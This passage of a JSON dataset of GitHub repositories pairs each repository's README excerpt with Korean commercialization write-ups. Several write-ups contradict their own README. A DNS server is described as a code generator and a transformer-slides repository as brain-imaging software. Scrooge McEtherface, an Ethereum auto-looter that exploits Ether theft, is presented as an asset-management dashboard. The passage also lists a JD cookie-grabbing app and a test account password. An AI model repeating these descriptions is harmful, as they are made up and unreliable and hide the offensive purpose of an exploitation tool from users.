boot）已迁移至 https://github.com/ASoulCnki/ASoulCnkiBackend\n\n项目前端（基于vue2）已迁移至 https://github.com/ASoulCnki/ASoulCnkiFrontend\n\n项目新前端（基于vue3）已迁移至 https://github.com/ASoulCnki/ASoulCnkiFrontendV3\n\n本项目为枝网查重的动态+评论区爬虫部分\n\n爬虫部署文档:[Deploy.md](./Deploy.md)\n## 简介\n\n\n### 想法起源\n#### NGA Asoul板块 \n- [想搞一个asoul知网查重小作文](https://bbs.nga.cn/read.php?tid=27186618)。\n\n#### 豆瓣相关讨论\n- [一个想法，发病小作文查重系统， 来征求一下豆油的意见](https://www.douban.com/group/topic/230466414/)\n- [ASoul评论区发病小作文 枝网查重系统 需求讨论楼](https://www.douban.com/group/topic/230489644/?start=0)\n\n简单总结就是做一个A-Soul评论区的小作文数据库，并提供查重能力。让广大au可以精准甄别评论是是原偷/原创，还是从之前的评论区复制粘贴改词偷来的😈\n\n### A-Soul 简介\n\nA-SOUL是乐华娱乐于2020年11月23日公开的其旗下首个虚拟偶像团体，由5名成员组成。\n\nA-SOUL主页链接：https://space.bilibili.com/703007996 <br>\n乃琳：https://space.bilibili.com/672342685 <br>\n珈乐：https://space.bilibili.com/351609538 <br>\n嘉然：https://space.bilibili.com/672328094 <br>\n贝拉：https://space.bilibili.com/672353429 <br>\n向晚：http","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"ZhuSky/JDCookie","github_url":"https://github.com/ZhuSky/JDCookie","stars":6,"language":"Java","license":"unknown","abandonment_months":54,"description":"# ZhuSky/JDCookie 분석 보고서\n\n## 왜 보물인가\n쇼핑몰 자동 로그인 정보를 관리해주는 도구로, 반복적인 로그인 작업을 없앨 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 쇼핑몰 계정을 한 곳에서 관리하는 구독형 대시보드 제공\n2. **내부 업무 도구**: 전자상거래 회사의 직원들이 고객 계정 테스트·모니터링에 ","readme_excerpt":"# JDCookie\n京东获取cookie，仅供学习参考，喜欢的请给个star🙏   \n[APK下载地址](https://github.com/ZhuSky/JDCookie/releases/download/v1.0.0/app-release.apk)  \n![APP](https://github.com/ZhuSky/JDCookie/raw/main/images/image.png)","composite_score":0.5019,"license_safety_tag":"unknown"},{"name":"GPUOpen-Effects/FidelityFX","github_url":"https://github.com/GPUOpen-Effects/FidelityFX","stars":11,"language":"","license":"MIT","abandonment_months":59,"description":"# FidelityFX 저장소 분석\n\n## 왜 보물인가\n게임과 영상 작업에서 그래픽 품질을 높이면서도 처리 속도를 빠르게 해주는 AMD의 공개 기술 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **게임 개발사의 SaaS 엔진 서비스**: 인디 게임 개발자들을 위해 이 기술이 내장된 클라우드 게임 개발 환경을 월 구독으로 제공\n2. **영상 제작 회사의 내","readme_excerpt":"# FidelityFX\n\nFidelityFX is our series of optimized, shader-based features aimed at improving rendering quality and performance.\n\nThese features are designed to be easy to integrate, and we ship HLSL and/or GLSL versions of the effects to allow you to target any API.\n\n## Contrast Adaptive Sharpening (CAS)\nCAS is a low overhead adaptive sharpening algorithm with optional up-sampling.\n\nFind out more:\n- [FidelityFX CAS source code](https://github.com/GPUOpen-Effects/FidelityFX-CAS/)\n- [FidelityFX CAS on GPUOpen](https://gpuopen.com/fidelityfx-cas)\n\n## Combined Adaptive Compute Ambient Occlusion (CACAO)\nCACAO is a highly optimized adaptive sampling ambient occlusion implementation.\n\nFind out more:\n- [FidelityFX CACAO source code](https://github.com/GPUOpen-Effects/FidelityFX-CACAO/)\n- [FidelityFX CACAO on GPUOpen](https://gpuopen.com/fidelityfx-cacao)\n\n## Luminance Preserving Mapper (LPM)\nLPM is is a tone mapping and gamut mapping solution for HDR and wide gamut content.\n\nFind out more:\n- ","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"chunqiuyiyu/ervy","github_url":"https://github.com/chunqiuyiyu/ervy","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":33,"description":"# Ervy 저장소 분석\n\n## 왜 보물인가\n터미널 환경에서 데이터를 시각적인 그래프로 변환해주는 도구로, 복잡한 숫자 데이터를 한눈에 이해할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 분석 대시보드 기능으로 제공하여 사용자가 통계를 실시간으로 시각화\n- **내부 업무 도구**: 회사의 판매 현황, 방문자 수, 재","readme_excerpt":"```\n___________                    \n\\_   _____/_________  _____.__.\n |    __)_\\_  __ \\  \\/ <   |  |\n |        \\|  | \\/\\   / \\___  |\n/_______  /|__|    \\_/  / ____|\n        \\/              \\/     \n```\n[![Travis (.org)](https://img.shields.io/travis/chunqiuyiyu/ervy.svg?style=flat-square)](https://travis-ci.org/chunqiuyiyu/ervy)\n![GitHub](https://img.shields.io/github/license/chunqiuyiyu/ervy.svg?style=flat-square)\n[![JavaScript Style Guide](https://img.shields.io/badge/code_style-standard-brightgreen.svg?style=flat-square)](https://standardjs.com)\n[![Install Size](https://flat.badgen.net/packagephobia/install/ervy)](https://packagephobia.now.sh/result?p=ervy)\n\n> Bring charts to terminal\n\n## Preview\n\n[Live Demo](https://www.chunqiuyiyu.com/ervy#demo)(powered by [jQuery Terminal Emulator](https://terminal.jcubic.pl/))\n\n## Why build this\nThere is no special reason, just because I love terminal and ASCII art. It's very cool! Hope you enjoy Ervy and make your terminal more beautiful.\n\n## Sup","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"tjuskyzhang/Scaled-YOLOv4-TensorRT","github_url":"https://github.com/tjuskyzhang/Scaled-YOLOv4-TensorRT","stars":16,"language":"C++","license":"unknown","abandonment_months":40,"description":"# Scaled-YOLOv4-TensorRT 분석\n\n## 왜 보물인가\nCCTV나 자동 감지 카메라에서 물체를 빠르게 인식하는 기술로, 실시간 감시 시스템의 핵심 엔진 역할을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **CCTV 영상 분석 SaaS**: 공장 생산라인의 불량품 자동 감지 시스템을 클라우드로 제공\n2. **소매점 손실 방지 API**:","readme_excerpt":"# README\n\n## Scaled-YOLOv4-TensorRT:\n\nImplement yolov4-tiny-tensorrt, yolov4-csp-tensorrt, yolov4-large-tensorrt(p5, p6, p7) layer by layer using TensorRT API.","composite_score":0.5019,"license_safety_tag":"unknown"},{"name":"juntang-zhuang/ShelfNet","github_url":"https://github.com/juntang-zhuang/ShelfNet","stars":14,"language":"Python","license":"MIT","abandonment_months":64,"description":"# ShelfNet 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터가 선반이나 진열대의 상품을 자동으로 인식하고 정리 상태를 파악할 수 있는 기술로, 소매점이나 창고의 재고 관리를 획기적으로 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 스마트 선반 관리 플랫폼**\n- 편의점·마트가 CCTV로 선반 상태를 실시간 모니터링하고 자동으","readme_excerpt":"# ShelfNet-lightweight for paper ([ShelfNet for fast semantic segmentation](https://arxiv.org/abs/1811.11254))\n* This repo contains implementation of ShelfNet-lightweight models for real-time models on Cityscapes. <br/>\n* For real-time tasks, we achieved 74.8% mIoU on Ctiyscapes dataset, with a speed of 59.2 FPS (61.7 FPS for BiSeNet at 74.7% on a GTX 1080Ti GPU). <br/>\n* For non real-time tasks, we achieved 79.0% mIoU on Cityscapes test set with ResNet34 backbone, suparssing other models (PSPNet and BiSeNet) with largers backbones with ResNet50 or Resnet 101 backbone. <br/>\n* For Non light-weight ShelfNet implementation, refer to another [ShelfNet repo](https://github.com/juntang-zhuang/ShelfNet). <br/>\n* This branch is the result on Cityscapes experiment, for results on PASCAL, see branch ```pascal```\n\nThis repo is based on two implementations [Implementation 1](https://github.com/ycszen/TorchSeg) and [Implementation 2](https://github.com/CoinCheung/BiSeNet). This implementation take","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"owlwalks/rind","github_url":"https://github.com/owlwalks/rind","stars":7,"language":"Go","license":"BSD-3-Clause","abandonment_months":81,"description":"# RIND 저장소 분석\n\n## 왜 보물인가\n개발자들이 반복적으로 작성하는 기본 코드를 자동으로 생성해주는 도구로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 개발자 대상 구독형 코드 생성 플랫폼으로 월정액 수익 모델 운영\n2. **내부 업무 도구**: 대규모 개발팀이 자사의 코딩 규칙에 맞게 커스터","readme_excerpt":"# UNMAINTAINED, PLEASE SEE OTHER ALTERNATIVES BELOW\n\n* [coredns](https://github.com/coredns/coredns)\n\n## Rind\n\n[![GoDoc](https://godoc.org/github.com/owlwalks/rind?status.svg)](https://godoc.org/github.com/owlwalks/rind)\n[![Build Status](https://travis-ci.com/owlwalks/rind.svg?branch=master)](https://travis-ci.com/owlwalks/rind)\n\nRind is a DNS server with REST interface for records management, best use is for your local service discovery, DNS forwarding and caching.\n\n## Examples\nSee complete example [here](https://github.com/owlwalks/rind/blob/master/rind/main.go)\n\nStart DNS server:\n```golang\nimport github.com/owlwalks/rind\n\nrind.Start(\"rw-dirpath\", []net.UDPAddr{{IP: net.IP{1, 1, 1, 1}, Port: 53}})\n```\n\n## Manage records\n```shell\n// Add a SRV record\ncurl -X POST \\\n  http://localhost/dns \\\n  -H 'Content-Type: application/json' \\\n  -d '{\n\t\"Host\": \"_sip._tcp.example.com.\",\n\t\"TTL\": 300,\n\t\"Type\": \"SRV\",\n\t\"SRV\": {\n\t\t\"Priority\": 0,\n\t\t\"Weight\": 5,\n\t\t\"Port\": 5060,\n\t\t\"Target\": \"sipserver.exampl","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"nactio/nact","github_url":"https://github.com/nactio/nact","stars":5,"language":"TypeScript","license":"Apache-2.0","abandonment_months":39,"description":"# nactio/nact 프로젝트 분석\n\n## 왜 보물인가\n메시지 기반으로 여러 작업을 동시에 처리할 수 있는 시스템을 쉽게 만들 수 있는 도구로, 대규모 데이터를 빠르게 처리해야 하는 회사들에게 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 알림 서비스 SaaS**\n수천 명의 사용자에게 동시에 메시지를 보내야 하는 푸시알림, 이메일 발송 플랫","readme_excerpt":"![nact Logo](https://raw.githubusercontent.com/ncthbrt/nact/master/assets/logo.svg?sanitize=true)\n\n**nact ⇒ node.js + actors**\\\n*your services have never been so µ*\n\n<!-- Badges -->\n![.github/workflows/npm-publish.yml](https://github.com/ncthbrt/nact/workflows/.github/workflows/npm-publish.yml/badge.svg)&nbsp; [![Coveralls](https://img.shields.io/coveralls/ncthbrt/nact.svg?style=flat-square)]() [![DeepScan Grade](https://deepscan.io/api/projects/908/branches/1863/badge/grade.svg)](https://deepscan.io/dashboard/#view=project&pid=908&bid=1863)\n\n[![npm](https://img.shields.io/npm/v/nact.svg?style=flat-square)](https://www.npmjs.com/package/nact) [![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fncthbrt%2Fnact.svg?type=shield)](https://app.fossa.io/projects/git%2Bgithub.com%2Fncthbrt%2Fnact?ref=badge_shield) [![js-semistandard-style](https://img.shields.io/badge/code%20style-semistandard-blue.svg?style=flat-square)](https://github.com/Flet/semistandard) [![we are reacti","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"DA-southampton/TRM_tutorial","github_url":"https://github.com/DA-southampton/TRM_tutorial","stars":8,"language":"","license":"unknown","abandonment_months":53,"description":"# TRM_tutorial 저장소 분석\n\n## 왜 보물인가\n뇌 영상 데이터를 분석하고 시각화하는 기술을 누구나 배울 수 있는 튜토리얼이라는 점에서 의료·연구 분야의 진입장벽을 낮추는 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신경과학 연구자를 위한 웹 기반 뇌 영상 분석 플랫폼\n2. **내부 업무 도구**: 병원·연구소의 의","readme_excerpt":"## TRM变体模型代码解读ppt\n","composite_score":0.5019,"license_safety_tag":"unknown"},{"name":"Babylonpartners/DrawerKit","github_url":"https://github.com/Babylonpartners/DrawerKit","stars":11,"language":"Swift","license":"MIT","abandonment_months":39,"description":"# DrawerKit 분석 리포트\n\n## 왜 보물인가\n앱이나 웹사이트에서 화면 아래에서 슥 올라오는 메뉴 패널을 쉽게 만들 수 있는 도구라서, 개발자들이 같은 기능을 반복해서 만드는 수고를 덜어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로젝트 관리, 메시징 앱 등에서 사용자 메뉴나 상세 정보를 아래에서 올라오는 패널로 제공\n2. *","readme_excerpt":"# DrawerKit\n\n[![circleci](https://circleci.com/gh/Babylonpartners/DrawerKit/tree/master.svg?style=svg)](https://circleci.com)\n[![Carthage](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n[![Version](https://img.shields.io/cocoapods/v/DrawerKit.svg?style=flat)](http://cocoapods.org/pods/DrawerKit)\n[![Platform](https://img.shields.io/cocoapods/p/DrawerKit.svg?style=flat)](http://cocoapods.org/pods/DrawerKit)\n[![Swift 4.0.x](https://img.shields.io/badge/Swift-4.0.x-orange.svg)](https://swift.org)\n[![Xcode](https://img.shields.io/badge/Xcode-9.x-blue.svg)](https://developer.apple.com/xcode)\n[![License](https://img.shields.io/cocoapods/l/DrawerKit.svg?style=flat)](http://cocoapods.org/pods/DrawerKit)\n\n## What is DrawerKit?\n__DrawerKit__ is a custom view controller presentation mimicking the kind of behaviour in the Apple Maps app. It lets any view controller modally present another arbitrary view controller. Hence, content is pa","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"wagoodman/bashful","github_url":"https://github.com/wagoodman/bashful","stars":5,"language":"Go","license":"MIT","abandonment_months":51,"description":"# Bashful 저장소 분석\n\n## 왜 보물인가\n복잡한 작업들을 순서대로 자동으로 실행해주는 도구로, 반복되는 일을 손쉽게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 회사의 일일 데이터 백업, 리포트 생성, 시스템 점검 등을 자동으로 순차 실행\n2. **SaaS 서비스**: 고객사의 서버 관리 작업을 자동화하는 클라우드","readme_excerpt":"# bashful\n\n[![Travis CI](https://api.travis-ci.org/wagoodman/bashful.svg?branch=master)](https://travis-ci.org/wagoodman/bashful) [![Go Report Card](https://goreportcard.com/badge/github.com/wagoodman/bashful)](https://goreportcard.com/report/github.com/wagoodman/bashful)\n\n**This is beta quality!** Use at your own risk.\n\nUse a yaml file to stitch together commands and bash snippets and run them with a bit of style. \nWhy? Because your bash script should be quiet and shy-like (...and not such a loud mouth). \n\n![Image](.data/demo.gif)\n\n*\"But why would you make this monstrosity?\"* you ask... because ` &>/dev/null` and ` | tee -a some.log` and `set -e; do something; set +e` and other similar things is getting annoying. And besides... why shouldn't your bash script output look pretty?\n\n**Features:**\n- [x] Run bash snippits ('tasks') in series or parallel\n- [x] A nice vertical progress bar to show current task status (with inline realtime stdout/stderr)\n- [x] Download url references to bash s","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"HaveIBeenPwned/PwnedPasswordsCloudflareWorker","github_url":"https://github.com/HaveIBeenPwned/PwnedPasswordsCloudflareWorker","stars":49,"language":"TypeScript","license":"BSD-3-Clause","abandonment_months":35,"description":"# PwnedPasswordsCloudflareWorker 분석\n\n## 왜 보물인가\n사용자의 비밀번호가 과거에 유출된 적 있는지 빠르고 안전하게 확인할 수 있는 도구로, 개인 정보 보호가 중요한 모든 온라인 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 회원가입·비밀번호 변경 시 자동으로 유출 여부를 검사하는 기능으로 사","readme_excerpt":"# 👷 `Pwned Passwords Cloudflare Worker`\n## k anonymity cloudflare worker\n\nBased on the template for kick starting a Cloudflare worker project.\n\n[`index.ts`](src/index.ts) is the content of the Workers script.\n\n### TODO\n- [ ] Migrate any other code and settings here\n- [ ] Test/Staging/Dev configs for API endpoints\n- [ ] Document automated upload to CF with Wrangler vs current Dashboard copy/paste process\n- [ ] Add/ask about exception capturing/handling?\n- [ ] Other open source items?\n- [ ] Review Code of Conduct - @troy\n\n#### Wrangler\n\nTo generate using [wrangler](https://github.com/cloudflare/wrangler)\n\n```\nwrangler generate projectname https://github.com/cloudflare/worker-template\n```\n\nFurther documentation for Wrangler can be found [here](https://developers.cloudflare.com/workers/tooling/wrangler).\n","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"fossasia/dev.openvent.io","github_url":"https://github.com/fossasia/dev.openvent.io","stars":12,"language":"Swift","license":"Apache-2.0","abandonment_months":36,"description":"# fossasia/dev.openvent.io 분석 보고서\n\n## 왜 보물인가\n행사나 컨퍼런스를 온라인으로 쉽게 관리하고 참가자들을 모을 수 있는 플랫폼으로, 팬데믹 이후 증가하는 온라인 이벤트 수요를 직접 충족합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월간 구독형 이벤트 관리 플랫폼으로 기업과 개인 행사 주최자에게 판매\n- **내부","readme_excerpt":"## Open Event Organizer iOS App\n> Event management app for organizers using Open Event Platform\n\n<img height=\"200px\" src=\"https://user-images.githubusercontent.com/3874064/29111547-5814a318-7d08-11e7-8c86-0a10a640825e.png\" />\n\n## Roadmap\n\nMake the app functionality and UI/UX similar to the [Android app](https://github.com/fossasia/open-event-orga-app) for Open Event Organizer.\n\n## Communication\n\nPlease join our mailing list to discuss questions regarding the project: https://groups.google.com/forum/#!forum/open-event\n\nOur chat channel is on gitter here: https://gitter.im/fossasia/open-event-ios\n\n## Development\n\n- A native iOS app.\n- The [Open Event Organizer Server](https://github.com/fossasia/open-event-orga-server) acts as the backend for this application. The API docs for the same can be accessed at https://open-event-api-dev.herokuapp.com/ .\n- The following account can be used for testing and development purposes:\n\n  > **Email:** orgadeveloper@gmail.com\n\n  > **Password:** fossasia\n","composite_score":0.5019,"license_safety_tag":"safe"},{"name":"liuhuanyong/PersonGraphDataSet","github_url":"https://github.com/liuhuanyong/PersonGraphDataSet","stars":13,"language":"","license":"unknown","abandonment_months":65,"description":"# PersonGraphDataSet 상용화 분석\n\n## 왜 보물인가\n실명 인물 간의 관계망을 체계적으로 정리한 데이터베이스로, 인물 추천·검색·관계 분석이 필요한 서비스들의 핵심 기반 재료가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **인물 관계 검색 SaaS**: 특정 인물과 연결된 모든 사람을 찾아주는 LinkedIn 스타일의 전문가 네트워크","readme_excerpt":"# PersonGraphDataSet\nPersonGraphDataSet, nearly 10 thousand person2person relationship facts that build from extraction method, which can be applied to person kg search and inference applications。  人物图谱数据集，近十万的人物关系图谱事实数据库，通过人物关系抽取算法抽取+人工整理得出，可用于人物关系搜索、查询、人物关系多跳问答，以及人物关系推理等场景提供基础数据。\n\n# 项目由来\n关于为什么要开放这个项目，主要有以下几个方面的缘由：  \n1、阶段性总结。以刻画人物复杂关系为核心的网络关系网构建，具有十分重要的现实意义，两年前，带着个人兴趣，发布了一个未完成版的人物关系知识图谱项目(https://github.com/liuhuanyong/PersonRelationKnowledgeGraph)，    尝试采用基于知识库的数据回标,基于远程监督与bootstrapping方法的人物关系抽取，并以此完成基于知识图谱的知识问答等应用。但但由于工作时间为题，一直没能更新。今天，先对该工作的一个结果数据集开放出来，以对之前的项目做一个阶段性的总结。  \n2、数据集空缺。目前，面向中文领域的人物关系抽取数据集，还相对较少，代表性有ccks2019的开放数据集（https://arxiv.org/abs/1907.12801） ，该数据集公开了亲属关系、社交关系、师生关系三大类，现夫、前夫、朋友、恋人等34小类的人物关系数据集。该数据集是面向评测使用的，其所涉及的人物关系类型有限，并且不提供现成可用的人物关系数据。  \n3、应用驱动。当前，面向知识图谱入门级别的知识图谱推理、知识图谱可视化、知识问答、图谱搜索等场景，还缺乏可用的数据集。目前关于人物关系方面的应用，目前看到的，主要是百科类的展示以及搜狗人物图谱（https://www.sogou.com/tupu/person.html） 为代表，虽说是娱乐导向，但目前还缺乏这样的练手的数据和项目。  \n4、应用支撑。基于开放出来的人物关系知识数据，大家可以在此基础上进行多种应用尝试，包括算法训练、知识图谱入门、培训等等，这十分","composite_score":0.5018,"license_safety_tag":"unknown"},{"name":"egojump/docup","github_url":"https://github.com/egojump/docup","stars":37,"language":"TypeScript","license":"MIT","abandonment_months":32,"description":"# egojump/docup 분석 보고서\n\n## 왜 보물인가\n복잡한 문서를 간단하게 정리하고 공유할 수 있는 도구로, 팀 내 정보 공유와 협업 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 문서 자동 생성 및 관리 기능을 월 구독으로 제공하는 온라인 플랫폼\n2. **내부 업무 도구**: 회사 매뉴얼, 사업 지침,","readme_excerpt":"# Docup\n\n**Docup** is a single JavaScript file that fetches Markdown file and renders it as a beautiful one-page documentation.\n\nDocup is built with Preact, the entire bundle (with CSS) is just 30kB minified and gzipped.\n\n[View Documentation](https://docup.now.sh)\n\n[Donate](https://github.com/sponsors/egoist)\n\n## Liense\n\nMIT &copy; [EGOIST (Kevin Titor)](https://github.com/sponsors/egoist)\n","composite_score":0.5018,"license_safety_tag":"safe"},{"name":"lazyparser/minimalist-team-leader","github_url":"https://github.com/lazyparser/minimalist-team-leader","stars":31,"language":"","license":"NOASSERTION","abandonment_months":38,"description":"# minimalist-team-leader 상용화 분석\n\n## 왜 보물인가\n복잡한 기능 없이 팀 리더가 필요한 핵심 기능만 간단하게 사용할 수 있는 팀 관리 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n스타트업과 소규모 팀을 위한 월 구독형 팀 관리 플랫폼으로 제공할 수 있습니다.\n\n**2. 내부 업무 도구**\n기업의 인사팀이나 ","readme_excerpt":"# 极简项目管理\n\n如果你即将要开始变成一个小团队的负责人，那么这本书或许能够帮助到你。\n\n可能你刚毕业不久，参加工作一年左右，得到了上司的认可开始带两三个新员工；可能你是高年级博士生，有几个硕士生围绕着你做项目；也可能你正在创业，需要组建一个小型技术团队来帮助你完成梦想。我们都能感到自己肩上的责任，领导的信任；但是团队管理这个事情好像并没有什么好说的：你拿到任务，分下去，过一段时间，收成果。这谁不会呢？\n\n如果你在阅读完这本小册子之后，在日常的团队管理中能够有帮助，对于我而言是莫大的鼓励。如果有问题或勘误，欢迎与我联系讨论，我的邮箱是 `lazyparser[at]gmail.com` 。\n\n这本小册子采用CC-BY-SA-NC方式发布，任何人都可以下载、打印、阅读传播。商业使用请联系我授权。本书的源代码是Markdown格式，托管在GitHub[1]上，可以根据自己需要转换成PDF、epub、azw、txt等多种格式。\n\n[1] https://github.com/lazyparser/minimalist-team-leader\n","composite_score":0.5018,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia-gci15","github_url":"https://github.com/fossasia/fossasia-gci15","stars":11,"language":"","license":"Apache-2.0","abandonment_months":61,"description":"# fossasia/fossasia-gci15 분석 보고서\n\n## 왜 보물인가\nFOSSASIA 커뮤니티의 오픈소스 프로젝트들을 한 곳에서 관리하고 배포할 수 있는 중앙 플랫폼으로, 전 세계 개발자들의 협력을 쉽게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **오픈소스 프로젝트 관리 SaaS**: 여러 팀의 코드를 통합 관리하고 공개하는 웹 서비스로 운영","readme_excerpt":"# Neurolab Hardware\n\nRepository for Neurolab Open Hardware platform.\n\n[![Build Status](https://travis-ci.org/fossasia/neurolab-hardware.svg?branch=master)](https://travis-ci.org/fossasia/neurolab-hardware)\n[![Gitter](https://badges.gitter.im/fossasia/neurolab.svg)](https://gitter.im/fossasia/neurolab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nWe are developing a neuro-device to collect brainwaves as a headband with integrated electronics. This repository holds the PCB schematics and layouts for the Neurolab Hardware. \n\nFront Side               | Back Side\n ----------------------- | ---------------------------\n![](docs/images/Top.png) | ![](docs/images/Bottom.png)\n\n## Buy\n\n* You ca","composite_score":0.5018,"license_safety_tag":"safe"},{"name":"SummerSec/BurpBountyProfiles","github_url":"https://github.com/SummerSec/BurpBountyProfiles","stars":9,"language":"BitBake","license":"unknown","abandonment_months":64,"description":"# BurpBountyProfiles 분석\n\n## 왜 보물인가\n웹사이트의 보안 취약점을 자동으로 찾아주는 도구를 위한 검사 규칙 모음으로, 보안 전문가들이 반복적인 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 검사 SaaS 플랫폼**: 웹사이트 소유자가 월 구독으로 자신의 사이트 보안을 자동 점검받는 서비스\n2. **기업 내부","readme_excerpt":"# burp-bounty-profiles\n\nThis is a collection of profiles for [Burp Bounty](https://github.com/wagiro/BurpBounty) extension, feel free to use and contribute!\n\n# Instructions\n\nOnce [Burp Bounty](https://github.com/wagiro/BurpBounty) is loaded in Burp Suite, go to Burp Bounty Options tab and set the path of your computer where you have cloned this repo.\n\nYou can support this work buying me a coffee:\n\n[<img src=\"https://cdn.buymeacoffee.com/buttons/v2/default-green.png\">](https://www.buymeacoffee.com/six2dez)\n","composite_score":0.5018,"license_safety_tag":"unknown"},{"name":"b-mueller/scrooge-mcetherface","github_url":"https://github.com/b-mueller/scrooge-mcetherface","stars":5,"language":"Python","license":"MIT","abandonment_months":37,"description":"# b-mueller/scrooge-mcetherface 분석\n\n## 왜 보물인가\n블록체인 기술을 이용해 암호화폐 자산을 자동으로 관리하고 추적할 수 있는 도구로, 복잡한 디지털 자산 관리를 단순화합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 투자자들을 위한 월 구독형 자산 관리 대시보드 (월 9.99달러부터 시작)\n2. **내부 ","readme_excerpt":"# Scrooge McEtherface\n\n[![Discord](https://img.shields.io/discord/481002907366588416.svg)](https://discord.gg/E3YrVtG)\n\nScrooge McEtherface is an Ethereum auto-looter based on [Mythril](https://github.com/ConsenSys/mythril/). It exploits instances of [Ether theft](https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-105) and [self-destruction](https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-106) caused by various issues including [integer arithmetic bugs](https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-101), [exposed initialization functions](https://smartcontractsecurity.github.io/SWC-registry/docs/SWC-118) and others. Use at your own peril.\n\n## Installation\n\n```bash\n$ git clone https://github.com/b-mueller/scrooge-mcetherface\n$ cd scrooge-mcetherface\n$ pip install -r requirements.txt\n$ cp config.ini.example config.ini\n```\n\nPython 3.5 or higher is required. Set up your RPC URL and Ethereum address in `config.ini`. The easiest way to test is using [","composite_score":0.5018,"license_safety_tag":"safe"},{"name":"Yecats/GameDevTutorials","github_url":"https://github.com/Yecats/GameDevTutorials","stars":6,"language":"C#","license":"GPL-3.0","abandonment_months":50,"description":"# GameDevTutorials 상품화 분석\n\n## 왜 보물인가\n게임 만드는 방법을 배우고 싶어 하는 수백만 명의 입문자들을 위해 실제 작동하는 예제 코드와 단계별 설명을 제공하는 교육 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 학습 플랫폼(SaaS)**: Unity나 Unreal 엔진 튜토리얼을 구독 형식으로 제공하는 온라인 강좌 서비스","readme_excerpt":"![twitter](https://img.shields.io/twitter/follow/yecats131?style=social) ![Twitter](https://img.shields.io/twitter/follow/whatupgames?style=social)\n\n# All tutorials have moved! They're now broken into their own repo and can be found [here](https://github.com/gamedev-resources).\n\nWeb friendly versions of the tutorials can be found here: https://gamedev-resources.com/\n","composite_score":0.5018,"license_safety_tag":"restricted"},{"name":"oakes/vim_cubed","github_url":"https://github.com/oakes/vim_cubed","stars":18,"language":"Nim","license":"Unlicense","abandonment_months":50,"description":"# oakes/vim_cubed 상용화 분석\n\n## 왜 보물인가\n텍스트 편집기에서 3D 시각화를 구현한 희귀한 기술로, 프로그래머의 작업 방식을 완전히 바꿀 수 있는 혁신적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **고급 코드 편집 SaaS**: 클라우드 기반 프로그래밍 환경으로 시각적 코드 구조 파악을 돕는 구독 서비스\n2. **개발자용 IDE 플","readme_excerpt":"## Vim³\n\nMost people use vim in two stupid dimensions. But not me. I use it in three:\n\n<p align=\"center\">\n  <img src=\"vim3.gif\" >\n</p>\n\nTo run it, [install Nim](https://nim-lang.org/install.html), and from this repo do:\n\n```\nnimble run vim3\n```\n\nOnce you're ready to start using it as your main editor, do:\n\n```\nnimble install paravim\nnimble install\n```\n\nAs long as `~/.nimble/bin` is on your PATH, you will now be able to open files like this:\n\n```\nvim3 path/to/myfile.txt\n```\n\n## Q & A\n\n### How do i acquire your power?\n\nIt's not that hard\n\n### How do i stop the cube from spinning\n\nno\n\n### I don't even have vim installed, how is this possible?\n\nIt's using [paravim](https://github.com/paranim/paravim) which has a real copy of vim built in\n\n### Which OS does it work on?\n\nAll of them pretty much\n\n### Why can't i run it on linux?\n\nCould be you need opengl libraries, try `sudo apt install xorg-dev libgl1-mesa-dev`\n\nYou might also need to do `sudo apt install libtinfo5`\n\n### I use arch btw\n\nTry ","composite_score":0.5018,"license_safety_tag":"unknown"},{"name":"wofmanaf/ResT","github_url":"https://github.com/wofmanaf/ResT","stars":31,"language":"Python","license":"Apache-2.0","abandonment_months":45,"description":"# ResT 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 처리 작업을 간단하게 자동화할 수 있는 도구로, 비즈니스 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 기업의 원본 데이터를 자동으로 정리하고 분석하는 웹 서비스로 판매\n2. **기업 내부 도구**: 대기업의 